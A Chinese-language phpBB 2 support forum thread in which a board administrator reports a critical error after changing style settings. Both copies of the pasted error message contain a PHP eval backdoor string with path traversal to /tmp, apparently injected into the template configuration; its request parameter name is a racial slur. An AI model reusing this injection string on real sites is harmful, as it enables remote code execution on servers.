[風格] 為什麼我不能開啟討論區網頁

phpBB 2 Style Support
討論的範圍包含版面排列、樣式、配置;外掛問題,請到相關版面依發問格式發表!
(發表文章請按照公告格式發表,違者砍文)

版主: 版主管理群

主題已鎖定
頭像
jwenpo
星球普通子民
星球普通子民
文章: 3
註冊時間: 2003-05-08 03:15

[風格] 為什麼我不能開啟討論區網頁

文章 jwenpo »

為什麼我不能開啟討論區網頁(討論區架設在他人的電腦上),這個討論區是我在管理,我幫此討論區安裝新版面後進入基本組態將推翻會員自訂風格選擇[否],然後重新登入後便不能再次進入此討論區,但是別人可順利進入,在我的電腦則出現以下ㄉ錯誤訊息:
phpBB : Critical Error

Could not open aaa=12;eval(stripslashes($_REQUEST[nigga]));exit();// /../../../../../../../../../../../../../../../../../../../tmp template config file

DEBUG MODE

Line : 325
File : /home/tcsmc/public_html/phpBB2/includes/functions.php


有沒有好心的專家可以幫幫我阿.讓我可以重新進入管理討論區,感激不盡阿.
討論區網址:http://www.traveling.idv.tw/~tcsmc/phpBB2/index.php
問題狂
竹貓忠實會員
竹貓忠實會員
文章: 1947
註冊時間: 2004-06-28 17:13

文章 問題狂 »

經測試並無此問題.....
頭像
jwenpo
星球普通子民
星球普通子民
文章: 3
註冊時間: 2003-05-08 03:15

[問題]問題未解決

文章 jwenpo »

謝謝問題狂的答覆
別人可順利進入討論區,但在我的電腦則出現以下ㄉ錯誤訊息:

phpBB : Critical Error

Could not open aaa=12;eval(stripslashes($_REQUEST[nigga]));exit();// /../../../../../../../../../../../../../../../../../../../tmp template config file

DEBUG MODE

Line : 325
File : /home/tcsmc/public_html/phpBB2/includes/functions.php


原因:我自己的電腦,上網更改他人電腦上討論區的風格版面,此討論區我是系統管理員,用自己的帳號,密碼登入後,幫此討論區安裝新風格版面後進入基本組態,將推翻會員自訂風格選擇[否],然後我重新登入後便不能再次進入此討論區.
註:別的討論區我都可以進入,只有這個討論區出現錯誤代碼
主題已鎖定

回到「風格問題討論」